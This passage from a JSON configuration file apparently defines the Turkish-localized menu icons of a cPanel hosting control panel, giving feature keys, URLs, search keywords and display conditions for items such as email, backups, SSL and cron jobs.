Address","group":"email","type":"image","if":"$HASROLE{'MailReceive'}"},"group_perf":{"base64_png_image":"","description":"Tercihler","onclick":"","subtype":"img","height":"48","target":"","key":"group_perf","width":"48","searchtext":"group_perf","file":"group_perf","grouporder":"8","groupdesc":"Tercihler","acontent":"","imgtype":"icon","type":"image","itemdesc":"group_perf","group":"preferences"},"group_advanced":{"groupdesc":"Gelişmiş","acontent":"","searchtext":"group_advanced","width":"48","file":"group_advanced","grouporder":"7","key":"group_advanced","height":"48","target":"","onclick":"","subtype":"img","description":"Gelişmiş","base64_png_image":"","itemdesc":"group_advanced","group":"advanced","type":"image","imgtype":"icon"},"ftp_connections":{"imgtype":"icon","url":"ftp/session.html","if":"$SERVICEPROVIDED{'ftp'} && !$hascloudlinux","plainitemdesc":"FTP Connections","group":"files","itemdesc":"FTP Bağlantıları","type":"image","touch":"ftp","key":"ftp_connections","target":"","height":"48","onclick":"","feature":"ftpaccts","subtype":"img","description":"FTP Bağlantıları","base64_png_image":"","itemorder":"7","acontent":"","file":"ftp_connections","searchtext":"FTP Bağlantıları ftp hesapları ftp oturum denetimi","width":"48"},"cron_jobs":{"plainitemdesc":"Cron Jobs","group":"advanced","itemdesc":"Cron İşleri","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","url":"cron/index.html","searchtext":"Cron İşleri cron işi cron sekmesi düzenle","width":"48","file":"cron_jobs","acontent":"","itemorder":"2","onclick":"","subtype":"img","description":"Cron İşleri","feature":"cron","base64_png_image":"","implements":"Cron_Home","key":"cron_jobs","height":"48","target":""},"manage_calendar_access":{"type":"image","group":"email","plainitemdesc":"Calendar Delegation","itemdesc":"Calendar Delegation","if":"$ccs_installed && $calendar_delegation","imgtype":"icon","url":"manage-calendar-access/index.html","width":48,"file":"manage_calendar_access","searchtext":"calendar delegation Calendar Delegation","acontent":"","itemorder":18,"base64_png_image":"","onclick":"","feature":"manage_calendar_access","subtype":"img","description":"Calendar Delegation","height":48,"target":"","key":"manage_calendar_access"},"contact_information":{"searchtext":"iletişim e-posta İletişim Bilgileri","file":"contact_information","width":"48","itemorder":"4","acontent":"","onclick":"","description":"İletişim Bilgileri","subtype":"img","feature":"updatenotificationprefs || updatecontact","base64_png_image":"","implements":"ContactInfo_Change","key":"contact_information","target":"","height":"48","plainitemdesc":"Contact Information","group":"preferences","itemdesc":"İletişim Bilgileri","type":"image","url":"contact/index.html","imgtype":"icon"},"leech_protection":{"imgtype":"icon","url":"htaccess/leechprotect/leechprotect.html","type":"image","plainitemdesc":"Leech Protection","group":"security","itemdesc":"Leech Koruması","if":"$HASROLE{'WebServer'}","base64_png_image":"","onclick":"","description":"Leech Koruması","subtype":"img","feature":"cpanelpro_leechprotect && webprotect","height":"48","target":"","key":"leech_protection","width":"48","searchtext":"Leech Koruması koru","file":"leech_protection","acontent":"","itemorder":"5"},"mailscanner":{"type":"image","itemdesc":"MailScanner","plainitemdesc":"MailScanner","group":"email","url":"mailscanner/index.html","imgtype":"icon","file":"mailscanner","searchtext":"MailScanner","width":"47","acontent":"","itemorder":"999","base64_png_image":"","subtype":"img","onclick":"","description":"MailScanner","feature":"mailscanner","target":"","height":"47"},"forwarders":{"url":"mail/fwds.html","imgtype":"icon","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'}","plainitemdesc":"Forwarders","group":"email","itemdesc":"İleticiler","type":"image","key":"forwarders","target":"","height":"48","onclick":"","subtype":"img","feature":"forwarders || emaildomainfwd","description":"İleticiler","base64_png_image":"","implements":"Email_Forwarders","acontent":"","itemorder":"3","searchtext":"İleticiler ilet","width":"48","file":"forwarders"},"imunify360":{"group":"security","plainitemdesc":"Imunify360","itemdesc":"Imunify360","type":"image","url":"imunify/imunify.live.pl","imgtype":"icon","itemorder":"10000","acontent":"","searchtext":"Imunify360","width":"47","file":"imunify360","height":"47","target":"","onclick":"","subtype":"img","feature":"imunify360","description":"Imunify360","implements":"Imunify_Home","base64_png_image":""},"jetbackupsnapshots":{"url":"jetbackup/index.html#!/snapshots","imgtype":"icon","type":"image","plainitemdesc":"Snapshots","group":"jetbackup","itemdesc":"Snapshots","base64_png_image":"","onclick":"","description":"Snapshots","subtype":"img","feature":"jetbackupsnapshots","target":"","height":"47","width":"47","searchtext":"Snapshots","file":"jetbackupsnapshots","acontent":"","itemorder":"9"},"jetbackupsettings":{"imgtype":"icon","url":"jetbackup/index.html#!/settings","type":"image","plainitemdesc":"Settings","group":"jetbackup","itemdesc":"Ayarlar","base64_png_image":"","subtype":"img","onclick":"","description":"Ayarlar","feature":"jetbackupsettings","target":"","height":"47","file":"jetbackupsettings","searchtext":"Ayarlar","width":"47","itemorder":"11","acontent":""},"two_factor_authentication":{"type":"image","plainitemdesc":"Two-Factor Authentication","group":"security","itemdesc":"İki Faktörlü Doğrulama","if":"$is_twofactorauth_sec_policy_enabled","url":"security/2fa/index.html","imgtype":"icon","searchtext":"İki Faktörlü Doğrulama 2fa tfa","file":"two_factor_authentication","width":"48","acontent":"","itemorder":"8","base64_png_image":"","onclick":"","feature":"twofactorauth","subtype":"img","description":"İki Faktörlü Doğrulama","height":"48","target":"","key":"two_factor_authentication"},"file_and_directory_restoration":{"height":"48","target":"","key":"file_and_directory_restoration","base64_png_image":"","subtype":"img","onclick":"","description":"File and Directory Restoration","feature":"filerestoration","acontent":"","itemorder":"11","file":"file_and_directory_restoration","searchtext":"File directory restoration File and Directory Restoration","width":"48","imgtype":"icon","url":"file_and_directory_restoration/index.html","if":"$file_restoration_enabled && $HASROLE{'FileStorage'}","type":"image","itemdesc":"File and Directory Restoration","group":"files","plainitemdesc":"File and Directory Restoration"},"ls_web_cache_manager":{"url":"ls_web_cache_manager.html.tt","imgtype":"icon","plainitemdesc":"LiteSpeed Web Cache Manager","group":"advanced","itemdesc":"LiteSpeed Web Cache Manager","type":"image","target":"","height":"47","onclick":"","subtype":"img","description":"LiteSpeed Web Cache Manager","feature":"ls_web_cache_manager","base64_png_image":"","acontent":"","itemorder":"1","searchtext":"LiteSpeed Web Cache Manager","width":"47","file":"ls_web_cache_manager"},"version_control":{"imgtype":"icon","url":"version_control/index.html","if":"$HASROLE{'FileStorage'}","type":"image","group":"files","plainitemdesc":"[asis,Git™] Version Control","itemdesc":"Git™ Version Control","height":"48","target":"","key":"version_control","base64_png_image":"","subtype":"img","onclick":"","feature":"version_control","description":"Git™ Version Control","itemorder":"10","acontent":"","file":"version_control","searchtext":"Git version control vcs repositories repository repo master checkout check out branch clone remote source code commit head gitweb history log publish deployment build continuous integration Git™ Version Control","width":"48"},"soft_div_icons":{"height":"47","target":"","base64_png_image":"","subtype":"img","onclick":"","feature":"soft_div_icons","description":"Softaculous Apps Installer","itemorder":"10","acontent":"","width":"47","searchtext":"Softaculous Apps Installer","file":"soft_div_icons","imgtype":"icon","url":"softaculous/index.live.php","type":"image","itemdesc":"Softaculous Apps Installer","group":"soft_div","plainitemdesc":"Softaculous Apps Installer"},"disk_usage":{"description":"Disk Kullanımı","onclick":"","subtype":"img","feature":"diskusageviewer","base64_png_image":"","key":"disk_usage","height":"48","target":"","file":"disk_usage","searchtext":"Disk Kullanımı disk alanı kullanımı disk kullanımı","width":"48","itemorder":"4","acontent":"","imgtype":"icon","url":"diskusage/index.html","itemdesc":"Disk Kullanımı","group":"files","plainitemdesc":"Disk Usage","type":"image","if":"$HASROLE{'FileStorage'}"},"web_disk":{"imgtype":"icon","url":"webdav/accounts_webdav.html","group":"files","plainitemdesc":"Web Disk","itemdesc":"Web Disk","type":"image","if":"$HASROLE{'WebDisk'} && $hascpdavd","subtype":"img","onclick":"","feature":"webdisk","description":"Web Disk","base64_png_image":"","key":"web_disk","target":"","height":"48","width":"48","searchtext":"Web Disk webdav webdisk","file":"web_disk","acontent":"","itemorder":"5"},"webalizer":{"plainitemdesc":"Webalizer","group":"metrics","itemdesc":"Webalizer","type":"image","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipwebalizer'}","url":"stats/webalizer_landing.html","imgtype":"icon","searchtext":"Webalizer istatistikleri","file":"webalizer","width":"48","acontent":"","itemorder":"7","subtype":"img","onclick":"","feature":"webalizer","description":"Webalizer","base64_png_image":"","key":"webalizer","target":"","height":"48"},"change_password":{"type":"image","group":"preferences","plainitemdesc":"Password [output,amp] Security","itemdesc":"Şifre & Güvenliği","imgtype":"icon","url":"passwd/index.html","file":"change_password","searchtext":"password & security change facebook external google secure cpanel Şifre & Güvenliği","width":"48","acontent":"","itemorder":"1","implements":"Password_Change","base64_png_image":"","onclick":"","feature":"password","subtype":"img","description":"Şifre & Güvenliği","height":"48","target":"","key":"change_password"},"mysql_databases":{"type":"image","group":"databases","plainitemdesc":"MySQL® Databases","itemdesc":"MySQL® Veritabanları","if":"$SERVICEPROVIDED{'mysql'}","imgtype":"icon","url":"sql/index.html","searchtext":"MySQL Databases db MySQL® Veritabanları","width":"48","file":"mysql_databases","itemorder":"2","acontent":"","implements":"Database_MySQL","base64_png_image":"","onclick":"","subtype":"img","feature":"mysql","description":"MySQL® Veritabanları","target":"","height":"48","key":"mysql_databases"},"php_pear_packages":{"url":"module_installers/index.html?lang=php-pear","imgtype":"icon","itemdesc":"PHP PEAR Paketleri","group":"software","plainitemdesc":"PHP PEAR Packages","type":"image","if":"$haspear","subtype":"img","onclick":"","description":"PHP PEAR Paketleri","feature":"modules-php-pear","base64_png_image":"","key":"php_pear_packages","target":"","height":"48","file":"php_pear_packages","searchtext":"PHP PEAR Paketleri","width":"48","acontent":"","itemorder":"2"},"group_security":{"key":"group_security","height":"48","target":"","description":"Güvenlik","onclick":"","subtype":"img","base64_png_image":"","acontent":"","groupdesc":"Güvenlik","grouporder":"6","searchtext":"group_security","file":"group_security","width":"48","imgtype":"icon","group":"security","itemdesc":"group_security","type":"image"},"visitors":{"itemorder":"1","acontent":"","searchtext":"en son ziyaretçiler Ziyaretçiler","file":"visitors","width":"48","target":"","height":"48","key":"visitors","base64_png_image":"","subtype":"img","onclick":"","feature":"lastvisits","description":"Ziyaretçiler","if":"$HASROLE{'WebServer'}","type":"image","plainitemdesc":"Visitors","group":"metrics","itemdesc":"Ziyaretçiler","imgtype":"icon","url":"stats/lastvisitors_landing.html"},"boxtrapper":{"url":"mail/boxtrapper.html","imgtype":"icon","type":"image","group":"email","plainitemdesc":"BoxTrapper","itemdesc":"BoxTrapper","if":"$HASROLE{'MailReceive'} && !$CONFIF{'skipboxtrapper'}","implements":"Email_BoxTrapper","base64_png_image":"","feature":"boxtrapper","onclick":"","description":"BoxTrapper","subtype":"img","height":"48","target":"","key":"boxtrapper","searchtext":"BoxTrapper filtresi","width":"48","file":"boxtrapper","itemorder":"16","acontent":""},"change_style":{"target":"","height":"48","key":"change_style","base64_png_image":"","subtype":"img","onclick":"","description":"Stili Değiştir","feature":"style","acontent":"","itemorder":"3","file":"change_style","searchtext":"dış görünüm teması Stili Değiştir","width":"48","url":"styleswitcher/index.html","imgtype":"icon","type":"image","group":"preferences","plainitemdesc":"Change Style","itemdesc":"Stili Değiştir"},"lvephpsel":{"base64_png_image":"","description":"Select PHP Version","onclick":"","subtype":"img","feature":"lvephpsel","height":"47","target":"","file":"lvephpsel","searchtext":"Select PHP Version","width":"47","itemorder":"999","acontent":"","url":"lveversion/php_selector.live.pl","imgtype":"icon","type":"image","itemdesc":"Select PHP Version","plainitemdesc":"Select PHP Version","group":"software"},"email_filters":{"itemorder":"10","acontent":"","width":"48","searchtext":"Kullanıcı Filtreleri E-posta kullanıcı düzeyi Filtreleme filtre E-posta Filtreleri","file":"email_filters","key":"email_filters","target":"","height":"48","subtype":"img","onclick":"","description":"E-posta Filtreleri","feature":"blockers","base64_png_image":"","implements":"Email_UserLevelFiltering","if":"$HASROLE{'MailReceive'}","group":"email","plainitemdesc":"Email Filters","itemdesc":"E-posta Filtreleri","type":"image","imgtype":"icon","url":"mail/filters/managefilters.html"},"greylisting":{"imgtype":"icon","url":"mail/greylisting/index.html","if":"$HASROLE{'MailReceive'} && $is_greylisting_enabled","type":"image","group":"email","plainitemdesc":"Configure Greylisting","itemdesc":"Gri Listeye Alma İşlemini Yapılandır","height":"48","target":"","key":"greylisting","implements":"Email_GreyListing","base64_png_image":"","subtype":"img","onclick":"","feature":"greylist","description":"Gri Listeye Alma İşlemini Yapılandır","acontent":"","itemorder":"17","file":"greylisting","searchtext":"Gri liste istenmeyen postaların gri listeye alınması Gri Listeye Alma İşlemini Yapılandır","width":"48"},"jetbackupfullbackups":{"type":"image","plainitemdesc":"Full Account Backups","group":"jetbackup","itemdesc":"Full Account Backups","imgtype":"icon","url":"jetbackup/index.html#!/fullBackups","width":"47","searchtext":"Full Account Backups","file":"jetbackupfullbackups","acontent":"","itemorder":"1","base64_png_image":"","subtype":"img","onclick":"","description":"Full Account Backups","feature":"jetbackupfullbackups","target":"","height":"47"},"jetbackupfilesbackups":{"imgtype":"icon","url":"jetbackup/index.html#!/fileBackups","type":"image","itemdesc":"File Backups","plainitemdesc":"File Backups","group":"jetbackup","base64_png_image":"","onclick":"","subtype":"img","description":"File Backups","feature":"jetbackupfilesbackups","target":"","height":"47","file":"jetbackupfilesbackups","searchtext":"File Backups","width":"47","itemorder":"2","acontent":""},"application_manager":{"type":"image","group":"software","plainitemdesc":"Application Manager","itemdesc":"Application Manager","url":"passenger/index.html","imgtype":"icon","acontent":"","itemorder":"8","searchtext":"apps passenger ruby ror gems rails Application Manager","file":"application_manager","width":"48","target":"","height":"48","key":"application_manager","base64_png_image":"","description":"Application Manager","onclick":"","subtype":"img","feature":"passengerapps"},"api_shell":{"type":"image","plainitemdesc":"API Shell","group":"advanced","itemdesc":"API Kabuğu","if":"$isreseller && $CONFIF{'api_shell'}","imgtype":"icon","url":"api_shell/index.html","searchtext":"API Kabuğu","width":"48","file":"api_shell","acontent":"","itemorder":"9","base64_png_image":"","onclick":"","subtype":"img","feature":"api_shell","description":"API Kabuğu","height":"48","target":"","key":"api_shell"},"bandwidth":{"imgtype":"icon","url":"stats/bandwidth.html","type":"image","plainitemdesc":"Bandwidth","group":"metrics","itemdesc":"Bant Genişliği","if":"$SERVICEPROVIDED{'ftp'} || $HASROLE{'MailReceive'} || $HASROLE{'WebServer'}","base64_png_image":"","onclick":"","subtype":"img","feature":"bandwidth","description":"Bant Genişliği","target":"","height":"48","key":"bandwidth","searchtext":"Bant Genişliği bandmin aktarımı","file":"bandwidth","width":"48","acontent":"","itemorder":"3"},"jetbackupqueue":{"acontent":"","itemorder":"8","searchtext":"Queue","file":"jetbackupqueue","width":"47","target":"","height":"47","onclick":"","subtype":"img","feature":"jetbackupqueue","description":"Queue","base64_png_image":"","plainitemdesc":"Queue","group":"jetbackup","itemdesc":"Queue","type":"image","url":"jetbackup/index.html#!/queues","imgtype":"icon"},"postgresql_database_wizard":{"imgtype":"icon","url":"psql/wizard1.html","if":"$SERVICEPROVIDED{'postgresql'} && $haspostgres","group":"databases","plainitemdesc":"PostgreSQL Database Wizard","itemdesc":"PostgreSQL Veritabanı Sihirbazı","type":"image","key":"postgresql_database_wizard","height":"48","target":"","onclick":"","description":"PostgreSQL Veritabanı Sihirbazı","subtype":"img","feature":"postgres","base64_png_image":"","itemorder":"6","acontent":"","searchtext":"PostgreSQL Database Wizard postgres postgresql database db PostgreSQL Veritabanı Sihirbazı","file":"postgresql_database_wizard","width":"48"},"ruby_on_rails":{"base64_png_image":"","onclick":"","description":"Ruby on Rails","subtype":"img","feature":"ror","height":"48","target":"","key":"ruby_on_rails","file":"ruby_on_rails","searchtext":"Ruby on Rails","width":"48","itemorder":"5","acontent":"","imgtype":"icon","url":"ror/index.html","type":"image","plainitemdesc":"Ruby on Rails","group":"software","itemdesc":"Ruby on Rails","if":"$hasrails"},"multiphp_manager":{"imgtype":"icon","url":"multiphp_manager/index.html","if":"$is_ea4","itemdesc":"MultiPHP Yöneticisi","plainitemdesc":"MultiPHP Manager","group":"software","type":"image","key":"multiphp_manager","target":"","height":"48","onclick":"","subtype":"img","description":"MultiPHP Yöneticisi","feature":"multiphp","base64_png_image":"","acontent":"","itemorder":"8","file":"multiphp_manager","searchtext":"MultiPHP Yöneticisi","width":"48"},"backup":{"imgtype":"icon","url":"backup/index.html","type":"image","plainitemdesc":"Backup","group":"files","itemdesc":"Yedekleme","if":"$HASROLE{'MailReceive'} || $HASROLE{'FileStorage'} || $SERVICEPROVIDED{'mysql'}","implements":"Backups_Home","base64_png_image":"","description":"Yedekleme","onclick":"","subtype":"img","feature":"backup","height":"48","target":"","key":"backup","searchtext":"Yedeklemeyi geri yükle","width":"48","file":"backup","acontent":"","itemorder":"9"},"canary":{"url":"canary/index.html","imgtype":"icon","if":"$is_sandbox && $exists_in_cpanel{'canary'}","plainitemdesc":"Canary","group":"sample_apps","itemdesc":"Canary","type":"image","key":"canary","height":"48","target":"","onclick":"","subtype":"img","description":"Canary","base64_png_image":"","itemorder":"1","acontent":"","file":"canary","searchtext":"sample apps Canary","width":"48"},"ssl_tls":{"file":"ssl_tls","searchtext":"SSL/TLS sertifika anahtarı csr","width":"48","itemorder":"3","acontent":"","implements":"SSL_TLS_Manager","base64_png_image":"","onclick":"","description":"SSL/TLS","subtype":"img","feature":"sslmanager","height":"48","target":"","key":"ssl_tls","type":"image","itemdesc":"SSL/TLS","group":"security","plainitemdesc":"SSL/TLS","if":"$HASROLE{'UserSSL'}","imgtype":"icon","url":"ssl/index.html"},"error_pages":{"url":"err/index.html","imgtype":"icon","type":"image","plainitemdesc":"Error Pages","group":"advanced","itemdesc":"Hata Sayfaları","if":"$HASROLE{'WebServer'}","base64_png_image":"","onclick":"","feature":"errpgs","subtype":"img","description":"Hata Sayfaları","height":"48","target":"","key":"error_pages","searchtext":"Hata Sayfaları hata günlüğü hata_günlüğü hata günlüğü","file":"error_pages","width":"48","acontent":"","itemorder":"5"},"encryption":{"url":"gpg/index.html","imgtype":"icon","type":"image","plainitemdesc":"Encryption","group":"email","itemdesc":"Şifreleme","if":"$HASROLE{'MailReceive'}","base64_png_image":"","onclick":"","subtype":"img","description":"Şifreleme","feature":"pgp","height":"48","target":"","key":"encryption","searchtext":"Şifreleme gpg anahtarları GnuPG Anahtarları","file":"encryption","width":"48","acontent":"","itemorder":"15"},"jetbackupemailbackups":{"plainitemdesc":"Email Backups","group":"jetbackup","itemdesc":"Email Backups","type":"image","imgtype":"icon","url":"jetbackup/index.html#!/emailBackups","searchtext":"Email Backups","file":"jetbackupemailbackups","width":"47","itemorder":"6","acontent":"","description":"Email Backups","onclick":"","subtype":"img","feature":"jetbackupemailbackups","base64_png_image":"","height":"47","target":""},"group_metrics":{"itemdesc":"group_metrics","group":"metrics","type":"image","imgtype":"icon","searchtext":"group_metrics","file":"group_metrics","width":"48","grouporder":"5","groupdesc":"Metrik","acontent":"","description":"Metrik","onclick":"","subtype":"img","base64_png_image":"","key":"group_metrics","target":"","height":"48"},"multiphp_ini_editor":{"if":"$is_ea4","group":"software","plainitemdesc":"MultiPHP INI Editor","itemdesc":"MultiPHP INI Düzenleyicisi","type":"image","imgtype":"icon","url":"multiphp_ini_editor/index.html","itemorder":"9","acontent":"","searchtext":"MultiPHP INI Düzenleyicisi PHP yapılandırması","file":"multiphp_ini_editor","width":"48","key":"multiphp_ini_editor","height":"48","target":"","onclick":"","subtype":"img","description":"MultiPHP INI Düzenleyicisi","feature":"multiphp_ini_editor","base64_png_image":""},"email_accounts":{"searchtext":"e-posta hesapları posta pop imap smtp E-posta Hesapları","width":"48","file":"email_accounts","acontent":"","itemorder":"1","onclick":"","subtype":"img","description":"E-posta Hesapları","feature":"popaccts","base64_png_image":"","implements":"Email_Accounts","key":"email_accounts","height":"48","target":"","plainitemdesc":"Email Accounts","group":"email","itemdesc":"E-posta Hesapları","type":"image","if":"$HASROLE{'MailReceive'}","url":"email_accounts/index.html","imgtype":"icon"},"user_manager":{"if":"$HASROLE{'FTP'} || $HASROLE{'WebDisk'}","type":"image","itemdesc":"Kullanıcı Yöneticisi","plainitemdesc":"User Manager","group":"preferences","imgtype":"icon","url":"user_manager/index.html","acontent":"","itemorder":"5","width":"48","searchtext":"şifre değişikliği ftp e-posta webdisk webdav hizmet Kullanıcı Yöneticisi","file":"user_manager","target":"","height":"48","key":"user_manager","base64_png_image":"","feature":"user_manager","onclick":"","subtype":"img","description":"cPanel hesabınızda çeşitli sistemlere erişebilecek kullanıcıları yönetin."},"mailing_lists":{"feature":"lists","onclick":"","subtype":"img","description":"Posta Listeleri","base64_png_image":"","implements":"Email_MailingLists","key":"mailing_lists","height":"48","target":"","file":"mailing_lists","searchtext":"Posta Listeleri mailman","width":"48","itemorder":"7","acontent":"","url":"mail/lists.html","imgtype":"icon","plainitemdesc":"Mailing Lists","group":"email","itemdesc":"Posta Listeleri","type":"image","if":"$HASROLE{'MailReceive'} && $HASROLE{'MailSend'} && !$CONFIF{'skipmailman'}"},"cpanel-site-monitor":{"searchtext":"$LANG{'addon cpanel site monitoring domain website plugin[comment cPanel Site Monitoring","width":"47","file":"cpanel-site-monitor","acontent":"","itemorder":"50","base64_png_image":"","onclick":"","feature":"site_monitor","subtype":"img","description":"cPanel Site Monitoring","search text keywords]'}":0,"target":"","height":"47","type":"image","itemdesc":"cPanel Site Monitoring","plainitemdesc":"cPanel Site Monitoring","group":"metrics","if":"$HASROLE{'WebServer'} && $experimental{'cpanel-site-monitoring'}","imgtype":"icon","url":"site-monitor/index.html"},"redirects":{"url":"mime/redirect.html","imgtype":"icon","group":"domains","plainitemdesc":"Redirects","itemdesc":"Yeniden yönlendirmeler","type":"image","if":"$HASROLE{'WebServer'}","description":"Yeniden yönlendirmeler","onclick":"","subtype":"img","feature":"redirects","base64_png_image":"","key":"redirects","height":"48","target":"","file":"redirects","searchtext":"Yeniden yönlendirmeler yeniden yaz mod yeniden yaz","width":"48","acontent":"","itemorder":"6"},"analog_stats":{"searchtext":"Analog İstatistikleri","file":"analog_stats","width":"48","itemorder":"6","acontent":"","base64_png_image":"","onclick":"","subtype":"img","description":"Analog İstatistikleri","feature":"analog","height":"48","target":"","key":"analog_stats","type":"image","itemdesc":"Analog İstatistikleri","plainitemdesc":"Analog Stats","group":"metrics","if":"$HASROLE{'WebServer'} && !$CONFIF{'skipanalog'}","imgtype":"icon","url":"stats/analog_landing.html"},"jetbackupgdpr":{"type":"image","plainitemdesc":"GDPR Compliance","group":"jetbackup","itemdesc":"GDPR Compliance","url":"jetbackup/index.html#!/gdpr","imgtype":"icon","width":"47","searchtext":"GDPR Compliance","file":"jetbackupgdpr","itemorder":"10","acontent":"","base64_png_image":"","description":"GDPR Compliance","onclick":"","subtype":"img","feature":"jetbackupgdpr","target":"","height":"47"},"mysql_database_wizard":{"description":"MySQL® Veritabanı Sihirbazı","onclick":"","subtype":"img","feature":"mysql","base64_png_image":"","key":"mysql_database_wizard","target":"","height":"48","width":"48","searchtext":"MySQL Database Wizard mysql database db MySQL® Veritabanı Sihirbazı","file":"mysql_database_wizard","itemorder":"3","acontent":"","url":"sql/wizard1.html","imgtype":"icon","itemdesc":"MySQL® Veritabanı Sihirbazı","plainitemdesc":"MySQL® Database Wizard","group":"databases","type":"image","if":"$SERVICEPROVIDED{'mysql'}"},"aliases":{"plainitemdesc":"Aliases","group":"domains","itemdesc":"Rumuzlar","type":"image","if":"$HASROLE{'WebServer'}","imgtype":"icon","url":"park/index.html","searchtext":"Rumuzlar Bekletilen etki alanları etki alanı","width":"48","file":"aliases","acontent":"","itemorder":"5","subtype":"img","onclick":"","description":"Rumuzlar","feature":"parkeddomains","base64_png_image":"","key":"aliases","height":"48","target":""},"group_email":{"grouporder":"1","searchtext":"group_email","width":"48","file":"group_email","acontent":"","groupdesc":"E-posta","onclick":"","subtype":"img","description":"E-posta","base64_png_image":"","key":"group_email","target":"","height":"48","group":"email","itemdesc":"group_email","type":"image","if":"$HASROLE{'MailSend'} || $HASROLE{'MailReceive'} || $HASROLE{'DNS'} || $HASROLE{'CalendarContact'}","imgtype":"icon"},"change_language":{"height":"48","target":"","key":"change_language","implements":"Locale_Change","base64_png_image":"","description":"Dili Değiştir","onclick":"","subtype":"img","feature":"setlang","itemorder":"2","acontent":"","file":"change_language","searchtext":"dil setlang Dili Değiştir","width":"48","imgtype":"icon","url":"setlang/index.html","type":"image","itemdesc":"Dili Değiştir","plainitemdesc":"Change Language","group":"preferences"},"images":{"type":"image","plainitemdesc":"Images","group":"files","itemdesc":"Görüntüler","if":"$HASROLE{'WebServer'}","url":"cpanelpro/images.html","imgtype":"icon","width":"48","searchtext":"görüntü yöneticisi yeniden boyutlandırma yöneticisi ölçekleyici küçük resim yapıcı biçimi Görüntüler","file":"images","acontent":"","itemorder":"2","base64_png_image":"","onclick":"","subtype":"img","description":"Görüntüler","feature":"cpanelpro_images","target":"","height":"48","key":"images"},"terminal":{"key":"terminal","target":"","height":"48","onclick":"","subtype":"img","description":"Web-based Terminal","feature":"ssh","base64_png_image":"","acontent":"","itemorder":"1","file":"terminal","searchtext":"terminal bash tcsh command line shell ssh Terminal","width":"48","imgtype":"icon","url":"terminal/index.html","if":"$hasvalidshell && $HASROLE{'FileStorage'}","itemdesc":"Terminal","group":"advanced","plainitemdesc":"Terminal","type":"image"},"tls_status":{"type":"image","plainitemdesc":"[asis,SSL]/[asis,TLS] Status","group":"security","itemdesc":"SSL/TLS Status","if":"$HASROLE{'UserSSL'}","imgtype":"icon","url":"security/tls_status/","searchtext":"SSL/TLS Status","width":"48","file":"tls_status","acontent":"","itemorder":"7","implements":"SSL_TLS_Status","base64_png_image":"","onclick":"","description":"SSL/TLS Status","subtype":"img","feature":"sslinstall","target":"","height":"48","key":"tls_status"},"dynamic_dns":{"itemorder":9,"acontent":"","searchtext":"dynamic dns ddns ip subdomain Dynamic DNS","width":48,"file":"dynamic_dns","key":"dynamic_dns","target":"","height":48,"onclick":"","subtype":"img","description":"Dynamic DNS","feature":"dynamicdns","base64_png_image":"","if":"$HASROLE{'DNS'}","itemdesc":"Dynamic DNS","plainitemdesc":"Dynamic DNS","group":"domains","type":"image","url":"dynamic-dns/index.html","imgtype":"icon"},"jetbackupcronbackups":{"searchtext":"Cron Job Backups","width":"47","file":"jetbackupcronbackups","acontent":"","itemorder":"3","onclick":"","subtype":"img","description":"Cron Job Backups","feature":"jetbackupcronbackups","base64_png_image":"","height":"47","target":"","plainitemdesc":"Cron Job Backups","group":"jetbackup","itemdesc":"Cron Job Backups","type":"image","url":"jetbackup/index.html#!/cronBackups","imgtype":"icon"},"apache_handlers":{"url":"mime/handle.html","imgtype":"icon","type":"image","group":"advanced","plainitemdesc":"Apache Handlers","itemdesc":"Apache İşleyiciler","if":"$HASROLE{'WebServer'}","base64_png_image":"","onclick":"","subtype":"img","feature":"handlers","description":"Apache İşleyiciler","target":"","height":"48","key":"apache_handlers","file":"apache_handlers","searchtext":"Apache İşleyiciler apache işleyiciler uzantı yapılandırması","width":"48","acontent":"","itemorder":"6"},"group_databases":{"acontent":"","groupdesc":"Veritabanları","grouporder":"3","width":"48","searchtext":"group_databases","file":"group_databases","target":"","height":"48","key":"group_databases","base64_png_image":"","onclick":"","description":"Veritabanları","subtype":"img","if":"$SERVICEPROVIDED{'mysql'} || $SERVICEPROVIDED{'postgresql'}","type":"image","group":"databases","itemdesc":"group_databases","imgtype":"icon"},"file_manager":{"height":"48","target":"file_manager","key":"file_manager","implements":"FileManager_Home","base64_png_image":"","description":"Dosya Yöneticisi","onclick":"","subtype":"img","feature":"filemanager","itemorder":"1","acontent":"target=\"file_manager\"","file":"file_manager","searchtext":"Dosya Yöneticisi dosya yöneticisi","width":"48","imgtype":"icon","url":"filemanager/index.html","if":"$HASROLE{'FileStorage'}","type":"image","plainitemdesc":"File Manager","group":"files","itemdesc":"Dosya Yöneticisi"},"addon_domains":{"if":"$HASROLE{'WebServer'}","itemdesc":"Eklenti Etki Alanları","group":"domains","plainitemdesc":"Addon Domains","type":"image","imgtype":"icon","url":"addon/index.html","acontent":"","itemorder":"3","width":"48","searchtext":"Etki Alanları Eklenti etki alanı Eklenti Etki Alanları","file":"addon_domains","key":"addon_domains","height":"48","target":"","subtype":"img","onclick":"","description":"Eklenti Etki Alanları","feature":"addondomains","base64_png_image":"","implements":"Domains_AddonDomains"},"email_deliverability":{"url":"email_deliverability/","imgtype":"icon","if":"$HASROLE{'MailSend'}","type":"image","plainitemdesc":"Email Deliverability","group":"email","itemdesc":"Email Deliverability","target":"","height":"48","key":"email_deliverability","implements":"Email_Authentication","base64_png_image":"","subtype":"img","onclick":"","description":"Email Deliverability","feature":"emailauth","itemorder":"11","acontent":"","width":"48","searchtext":"email Authentication Email Deliverability spf domain-keys authentication DKIM","file":"email_deliverability"},"wp_softaculous":{"width":"47","searchtext":"WordPress Manager by OdeaWeb Kurulum Aracı","file":"wp_softaculous","itemorder":"1","acontent":"","base64_png_image":"","implements":"Softaculous_WordPress","subtype":"img","onclick":"","description":"WordPress Manager by OdeaWeb Kurulum Aracı","feature":"wp_softaculous","height":"47","target":"","type":"image","plainitemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","group":"software","itemdesc":"WordPress Manager by OdeaWeb Kurulum Aracı","url":"softaculous/index.live.php?act=wordpress","imgtype":"icon"},"hotlink_protection":{"itemorder":"4","acontent":"","file":"hotlink_protection","searchtext":"Hotlink Koruması","width":"48","key":"hotlink_protection","height":"48","target":"","onclick":"","feature":"hotlink","subtype":"img","description":"Hotlink Koruması","base64_png_image":"","if":"$HASROLE{'WebServer'}","group":"security","plainitemdesc":"Hotlink Protection","itemdesc":"Hotlink 